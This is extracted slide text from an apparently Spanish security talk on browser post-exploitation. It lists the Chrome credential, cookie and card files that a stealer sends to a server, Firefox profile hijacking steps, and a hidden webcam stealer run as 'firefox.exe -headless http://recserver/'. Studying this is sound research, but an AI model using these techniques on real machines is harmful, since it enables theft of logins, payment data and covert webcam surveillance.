3. QUÉ ES ESTO...
Seguridad en navegadores web (chrome & firefox)
Algunas técnicas ofensivas (PoCs) “Post-Explotación”
Sencillos scripts en python y javascript
Puntos de partida para desarrollar Hi!Bro
4. ZeuS Web Browser Trojan
- Se detectó por primera vez en el año 2007 en EE. UU.
- Afectó a los navegadores IE y Firefox (Windows)
- 3.6 millones de ordenadores infectados (2009)
- Puerta de entrada a otros troyanos.
6. Principales características de ZeuS
Keystroke logging
- Consiste en almacenar
un registro con las
pulsaciones físicas de un
teclado.
Form grabbing
- Es un tipo de malware, que
trabaja recuperando las
credenciales de
autorización y registros de
un formulario web.
14. BROWSER STEALER
BROWSERS LOCAL DATA (IN CHROME ON WIN MACHINE)
● %APPDATA%LocalGoogleChromeUser DataDefaultLogin Data"
VICTIM
Run payload.exe...
15. BROWSER STEALER
BROWSERS LOCAL DATA (IN CHROME ON WIN MACHINE)
● %APPDATA%LocalGoogleChromeUser DataDefaultLogin Data"
● %APPDATA%LocalGoogleChromeUser DataDefaultCookies"
● %APPDATA%LocalGoogleChromeUser DataDefaultWeb Data"
○ Autocomplete, bank cards, browser searches
● %APPDATA%LocalGoogleChromeUser DataDefaultHistory"
○ browsing and downloads history
VICTIM
Run payload.exe...
16. BROWSER STEALER
VICTI
Run payload.exe...
SERVER logins, history, cookies, cc’s...
(base64Encoded)
VICTIM
BROWSERS LOCAL DATA (IN CHROME ON WIN MACHINE)
● %APPDATA%LocalGoogleChromeUser DataDefaultLogin Data"
● %APPDATA%LocalGoogleChromeUser DataDefaultCookies"
● %APPDATA%LocalGoogleChromeUser DataDefaultWeb Data"
○ Autocomplete, bank cards, browser searches
● %APPDATA%LocalGoogleChromeUser DataDefaultHistory"
○ browsing and downloads history
18. Profile Hijacking
Todo lo que tal se guarda en un perfil %AppData%RoamingMozillaFirefoxProfiles
● firefox.exe -createProfile “<profName profPath>”
● firefox.exe -P
VICTIM
Run payload.exe...
19. Profile Hijacking
VICTI
Run payload.exe...
SERVER GZIP Profiles Folders
VICTIM
Todo lo que tal se guarda en un perfil %AppData%RoamingMozillaFirefoxProfiles
● firefox.exe -createProfile “<profName profPath>”
● firefox.exe -P
20. Profile Hijacking
VICTI
Run payload.exe...
SERVER GZIP Profiles Folders
VICTIM
Todo lo que tal se guarda en un perfil %AppData%RoamingMozillaFirefoxProfiles
● firefox.exe -createProfile “<profName profPath>”
● firefox.exe -P
Unzip and create the new profile
SERVER
39. The wonderful world of client side hacking
HIDDEN WEBCAM STEALER WITH HEADLESS BROWSER
40. The wonderful world of client side hacking
HIDDEN WEBCAM STEALER WITH HEADLESS BROWSER
PROFILE INJECTION + HEADLESS FIREFOX + JAVASCRIPT
41. The wonderful world of client side hacking
HIDDEN WEBCAM STEALER WITH HEADLESS BROWSER
PROFILE INJECTION + HEADLESS FIREFOX + JAVASCRIPT
42. The wonderful world of client side hacking
HIDDEN WEBCAM STEALER WITH HEADLESS BROWSER
PROFILE INJECTION + HEADLESS FIREFOX + JAVASCRIPT
MEDIA.NAVIGATOR.PERMISSION.DISABLED
43. The wonderful world of client side hacking
HIDDEN WEBCAM STEALER WITH HEADLESS BROWSER
PROFILE INJECTION + HEADLESS FIREFOX + JAVASCRIPT
Run payload.exe...
VICTIM
profile injection;
firefox.exe -headless “http://recserver/”